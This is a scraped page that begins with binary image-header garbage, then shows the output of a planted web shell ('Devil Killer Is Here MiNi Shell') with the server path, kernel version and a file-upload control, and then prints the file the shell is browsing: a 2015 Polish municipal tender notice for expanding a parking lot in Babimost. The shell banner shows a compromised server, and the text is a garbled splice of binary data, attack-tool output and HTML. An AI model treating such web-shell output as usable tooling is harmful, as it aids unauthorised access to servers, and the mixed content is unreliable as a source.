JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150901/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150901/129111-N-2015.html

<p class="kh_header"><b>Babimost: Rozbudowa parkingu dla samochodów osobowych wraz ze zjazdem na drogę powiatową i drogę wewnętrzną</b><br>
<b>Numer ogłoszenia: 129111 - 2015; data zamieszczenia: 01.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Babimost , ul. Rynek 3, 66-110 Babimost, woj. lubuskie, tel. 068 3512034, faks 068 3512028.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.babimost.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa parkingu dla samochodów osobowych wraz ze zjazdem na drogę powiatową i drogę wewnętrzną.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Rozbudowa parkingu dla samochodów osobowych wraz ze zjazdem na drogę powiatową i drogę wewnętrzną. 1.1. PARKING WRAZ Z JEZDNIĄ MANEWROWĄ
Zaprojektowano parking o łącznej powierzchni 652 m2, w tym 19 m2 wyspy dzielące oraz 633 m2 miejsca postojowe wraz z jednią manewrową. Parking będzie posiadał nawierzchnię z kostki betonowej szarej. Zaplanowano wykonanie 23 miejsc postojowych dla samochodów osobowych: 21 miejsc o wymiarach 2,70mx5,00m, 1 miejsce o wymiarach 3,60mx5,00m, 1 miejsce o wymiarach 3,00mx6,00m.
Zgodnie z D1 Projekt zagospodarowania terenu, wykonana zostanie jezdnia manewrowa, umożliwiająca ruch dwukierunkowy pojazdów poruszających się po parkingu, o szerokości 6,00m z dwoma pasami szerokości 3,00m. Przy budynku nr 18 jako jezdnię manewrową wykorzystać istniejący plac o szerokości 7,70m, Wyokrąglenie łuków poziomych zaprojektowano promieniami o wartości R=14,50m i R=15,00m. Powierzchnia parkingu ograniczona jest krawężnikami betonowymi 15x30 cm, miejscowo 15x22cm obniżonymi w stosunku do jezdni o 1 cm oraz wyniesionym względem terenów zielonych o 2 cm, celem bezproblemowego spływu wód opadowych. Wyspy dzielące są wyniesione w stosunku do jezdni parkingu krawężnikiem betonowym 15x30cm o 12cm. Dojazd do planowanego parkingu zapewniony będzie przez istniejący zjazd z ul. Gagarina dz. nr 193 oraz przez projektowaną drogę wewnętrzną i zjazd na ul. Żwirki i Wigury. 1.2.	DROGA WEWNĘTRZNA Zaprojektowano drogę wewnętrzną umożliwiającą komunikację rozbudowywanego parkingu z drogą powiatową ul. Żwirki i Wigury zgodnie z decyzją o warunkach zabudowy wydaną przez Burmistrza Babimostu oraz decyzją lokalizacyjną na budowę zjazdu wydaną przez Zarząd Powiatu Zielonogórskiego Powiatowy Zielonogórski Zarząd Dróg. Droga będzie posiadać nawierzchnię z kostki betonowej szarej, o powierzchni 498,00m2. Droga wewnętrzna będzie ograniczona prawostronnie od strony terenów zielonych betonowym krawężnikiem najazdowym 15x22 na ławie betonowej z oporem z betonu C12 15 obniżony o 1cm w stosunku do nawierzchni jezdni i na 2 cm w stosunku do terenów zielonych, natomiast lewostronnie od strony terenów zielonych betonowym krawężnikiem najazdowym 15x30 na ławie betonowej z oporem z betonu C12 15 wyniesionym o 12cm w stosunku do nawierzchni jezdni. 1.3. ZJAZD Zaprojektowano zjazd publiczny zgodnie z decyzją o warunkach zabudowy wydaną przez Burmistrza Babimostu oraz decyzją lokalizacyjną wydaną przez Zarząd Powiatu Zielonogórskiego Powiatowy Zielonogórski Zarząd Dróg. Zjazd będzie posiadał nawierzchnię z kostki betonowej szarej, o powierzchni 40,00m. Przecięcie krawędzi zjazdu i drogi powiatowej wyokrąglone łukiem poziomym o promieniu R=6,00m. Projektowany zjazd będzie miał długość 5,03m od krawędzi drogi powiatowej do granicy pasa drogowego. Zjazd będzie ograniczony od strony jezdni drogi powiatowej i pobocza betonowym krawężnikiem najazdowym 15x22 na ławie betonowej z oporem z betonu C12 15 obniżony o 1cm w stosunku do nawierzchni zjazdu i na 2 cm w stosunku do jezdni drogi powiatowej, nad pobocze obsiane trawą krawężnik jest wyniesiony na 2cm. istniejące pobocze drogi powiatowej należy wyrównać do poziomu nawierzchni zjazdu. 1.4.	CHODNIK Przewidziano przebudowę istniejącego chodnika z kostki betonowej w zakresie objętym inwestycją wykonania parkingu. Chodnik należy wynieść ponad projektowany parking, krawężnikiem stojącym 15x30cm, zgodnie z rys. D5 i D6. Ciąg pieszy będzie posiadał nawierzchnię z kostki betonowej kolorowej. Chodnik będzie szeroki na 2,00m. W miejscu przecięcia chodnika z drogą wewnętrzną należy zastosować krawężnik najazdowy betonowy 15x22 na ławie z oporem z betonu C12 15, umożliwiając pieszym swobodne przejście. Nawierzchnia zjazdu: warstwa ścieralna kostka betonowa kolor szary 8 cm, podsypka cementowopiaskowa 1:4 3 cm, podbudowa z chudego betonu C8 10 20 cm, łączna grubość nawierzchni: 31 cm.
Nawierzchnia parkingu i drogi wewnętrznej: warstwa ścieralna kostka betonowa kolor szary 8 cm, podsypka cementowopiaskowa 1:4 3 cm, podbudowa z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu ciągłym 0do31,5mm 15 cm, grunt stabilizowany cementem Rm=2,5MPa 10 cm, łączna grubość nawierzchni: 36 cm. Nawierzchnia wysp dzielących: warstwa ścieralna kostka betonowa kolorowa 8 cm, podsypka cementowopiaskowa 1:4 3 cm, podbudowa z kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu ciągłym 0do31,5mm 15 cm, grunt stabilizowany cementem Rm=2,5MPa 10 cm, łączna grubość nawierzchni: 36 cm.
Nawierzchnia chodników: warstwa ścieralna kostka betonowa kolor czerwony 8 cm,
podsypka cementowopiaskowa 1:4 5 cm, łączna grubość nawierzchni 13 cm.
ZESTAWIENIE POWIERZCHNI: Obszar w zakresie opracowania: ok. 1680 m2, w tym: pow. zjazdu 40 m2, pow. miejsc postojowych i drogi wewnętrznej z k. bet. szarej 1110 m2, pow. wysp dzielących z k.bet. kolorowej 19m2, pow. przebudowywanego chodnika z k. bet. kolorowej 72 m2, pow. pobocza zjazdu 9 m2, pow. terenów zielonych 430m2. 1.5. Branża elektryczna wykonanie linii kablowej oświetlenia drogowego kablem YAKY 4x25 mm2 z czterema latarniami; wymiana dwóch słupów oświetleniowych; napięcie zasilania Un230 400V, system sieci TN C, moc zapotrzebowana oświetlenia Pz =  4 x 47 W led w ramach istniejącej umowy przyłączeniowej. Opis rozwiązań Wymiana istniejących słupów. Istniejące dwa słupy oświetleniowe wskazane na planie zagospodarowania należy wymienić na nowe, identyczne jak nowoprojektowane. Zasilanie oświetlenia Projektowaną linię oświetlenia parkingu zasilić z wymienionego istniejącego słupa zgodnie z projektem zagospodarowania. Linię  kablową  wykonać  kablem  YAKY 4x25 mm2. Wzdłuż projektowanej  linii  zamontować  cztery  stanowiska słupów oświetleniowych, zgodnie z rysunkiem E1. Zaprojektowano słupy oświetleniowe aluminiowe anodowane kolor srebrny o wysokości 6m z fundamentem, producent ROSA Tychy, typ oprawy magnolia led 47 W, barwę światła uzgodnić z Zamawiającym. Wykop pod  projektowaną linię kablową wykonać zgodnie z planem zagospodarowania.  Kabel w ziemi układać po linii falistej na głębokości 0,7m. Na dnie rowu kablowego o głębokości 0.7m nasypać warstwę piasku grubości 10cm, ułożyć kabel, przysypać 10 cm warstwą piasku i 15cm warstwą rodzimego gruntu. Całość osłonić folią ostrzegawczą koloru niebieskiego grubości 0,5mm i szerokości 20cm po czym zasypać rów pozostałym gruntem rodzimym. Kabel układać z 3% zapasem. Przy słupach ułożyć w ziemi zapas kabla dł. około 1,0 m. Poszczególne odcinki linii kablowej i przewodów typu YDY 3x2,5mm2 zasilających bezpośrednio oprawy łączyć w słupach  za  pomocą  złącz  izolowanych  typu  IZK. Na kablu w ziemi co 10m oraz w słupach założyć  oznacznik kablowy z trwałym opisem typ, przekrój, relacja, właściciel. Wszystkie przejścia przez ulice, chodniki oraz kolizje z uzbrojeniem terenowym wykonać w rurze osłonowej  typu arot DVK-75. Przy wykonywaniu robót ziemnych w miejscach zbliżeń i skrzyżowań z innymi sieciami uzbrojenia terenu wszelkie prace należy wykonać ręcznie oraz stosować się do uwag i wymogów użytkowników i uzgodnień  branżowych. 
Montaż słupów i opraw oświetleniowych wykonać zgodnie z DTR danego urządzenia 
i  zaleceniami producenta.  Całość prac związanych z budową kabla wykonać zgodnie z normą N SEP E 004 elektroenergetyczne i sygnalizacyjne linie kablowe. Oprawy w poszczególnych słupach oświetleniowych zasilać przewodem YDY 3x2,5mm2 poprzez zabezpieczenie WtzBi 4A instalowanymi w słupach.  Zestawienie materiałów 1. Kabel YAKY 4x 25 mm2 100 m. 2. Słup oświetleniowy aluminiowy anodowany kolor srebrny wys. 6m z oprawami magnolia led 47W 6 szt. 3. Folia ostrzegawcza niebieska szer. 20 cm 80 m. 4. Przepust kablowy arot typ DVK 75	14 m. Uwaga ww. podane obmiary są elementem pomocniczym Wykonawca jest zobowiązany do wyceny projektu budowlanego, a zaoferowana cena musi zawierać wszystkie koszty związane 
z wykonaniem zamówienia, w tym wszystkie koszty towarzyszące wykonaniu przedmiotu zamówienia opisane w niniejszej SIWZ i załącznikach do SIWZ.
Szczegółowy opis przedmiotu zamówienia znajduje się w dokumentacji technicznej - projekcie budowlanym, projekcie wykonawczym, niniejszej SIWZ, specyfikacji technicznej wykonania i odbioru robót, przedmiarze robót będącymi załącznikami do SIWZ.
2. Wszystkie materiały i urządzenia muszą posiadać odpowiednie atesty i certyfikaty, spełniać normy bezpieczeństwa. Wykonawca wykona przedmiot zamówienia z materiałów wyrobów dopuszczonych do używania w budownictwie w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (j. t.  Dz. U. z 2010 r. Nr 243, poz. 1623 ze zm.) oraz ustawy z dnia 16 kwietnia 2004 r. o wyrobach budowlanych ( Dz. U. z 2004 r. Nr 92, poz. 881 ze zm.) oraz innych przepisów, o ile mają zastosowanie.
3. Wszystkie materiały i urządzenia muszą być fabrycznie nowe oraz oznakowane zgodnie z wymogami wynikającymi z przepisów bezpieczeństwa, norm EN i PN oraz przepisów Prawa Budowlanego.
4. Planowany, zakres rzeczowy prac przedstawiony został w: projekcie budowlanym,    projekcie wykonawczym, przedmiarze robót, specyfikacji technicznej wykonania i odbioru robót. Wymienione dokumenty są załącznikami do niniejszej SIWZ.
Przedmiar robót stanowi jedynie element pomocniczy do kalkulacji kosztów. 
Roboty nie ujęte w przedmiarze robót, STWIOR i niniejszej SIWZ, a niezbędne do wykonania robót objętych projektem budowlanym i projektem wykonawczym nie będą stanowiły robót dodatkowych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.22.33.00-9, 45.23.14.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości: 4.000,00PLN (słownie: cztery tysiące złotych 00/100). Wadium musi być wniesione przed terminem składania ofert. Wadium musi obejmować okres związania ofertą</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień. Zamawiający nie wyznacza w tym zakresie szczegółowych warunków</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia posiadania wiedzy i doświadczenia wymagane jest wykazanie przez Wykonawcę wykonania co najmniej 1 roboty budowlanej polegającej na wykonaniu nawierzchni z kostki betonowej o powierzchni minimum 1.600m2, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu oświadczenia oraz dokumenty wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza w tym zakresie szczegółowych warunków</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza w tym zakresie szczegółowych warunków</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę, że:
a) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 250 000,00zł, 
b) posiada środki finansowe lub zdolność kredytową na kwotę równą co najmniej       150 000,00zł. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu oświadczenia oraz dokumenty wg formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania zamówienia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z postanowieniami art. 144 ust. 1 ustawy Prawo zamówień publicznych
Zamawiający przewiduje możliwość dokonania zmian po zawarciu umowy w sprawie zamówienia publicznego, pod warunkiem podpisania aneksu zaakceptowanego przez obie strony. W szczególności Zamawiający dopuszcza: 1) wprowadzenie zmian nieistotnych, 2) aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej itp., 3) jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym  wpływ na realizację przedmiotu zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wrota.lubuskie.pl/ugbabimost<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego - Urząd Miejski w Babimoście biuro nr 5, od dnia 01.09.2015r..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2015 godzina 10:00, miejsce: Sekretariat Urzędu Miejskiego w Babimoście ul. Rynek 3, 66 - 110 Babimost.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





